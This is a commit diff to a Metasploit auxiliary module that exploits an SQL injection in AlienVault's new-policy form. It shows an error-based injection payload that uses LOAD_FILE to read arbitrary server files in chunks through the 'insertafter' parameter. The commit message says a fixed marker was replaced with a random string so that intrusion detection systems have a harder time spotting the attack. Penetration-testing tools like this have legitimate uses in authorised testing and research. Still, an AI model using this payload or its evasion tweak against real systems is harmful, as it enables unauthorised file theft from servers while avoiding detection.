Update alienvault_newpolicyform_sqli.rb

enhanced as requested by Christian Mehlmauer 
changed xnDa to a random string to make IDS harder to detect.
bug/bundler_fix
Chris Hebert 2014-05-10 20:17:30 -04:00
parent 1affbfbe9d
commit 3ae3c478bd
1 changed files with 3 additions and 3 deletions

View File

@ -109,7 +109,7 @@ class Metasploit4 < Msf::Auxiliary
print_status("#{peer} - Exploiting SQLi...")
loop do
file = sqli(left_marker, right_marker, i, cookie, filename)
file = sqli(left_marker, right_marker, sql_true, i, cookie, filename)
return if file.nil?
break if file.empty?
@ -124,11 +124,11 @@ class Metasploit4 < Msf::Auxiliary
print_good("File stored at path: " + path)
end
def sqli(left_marker, right_marker, i, cookie, filename)
def sqli(left_marker, right_marker, sql_true, i, cookie, filename)
pay = "X') AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"
pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x#{filename})) AS CHAR),"
pay << "0x20)),#{(50*i)+1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
pay << " GROUP BY x)a) AND ('xnDa'='xnDa"
pay << " GROUP BY x)a) AND ('0x#{sql_true.unpack("H*")[0]}'='0x#{sql_true.unpack("H*")[0]}"
get = {
'insertafter' => pay,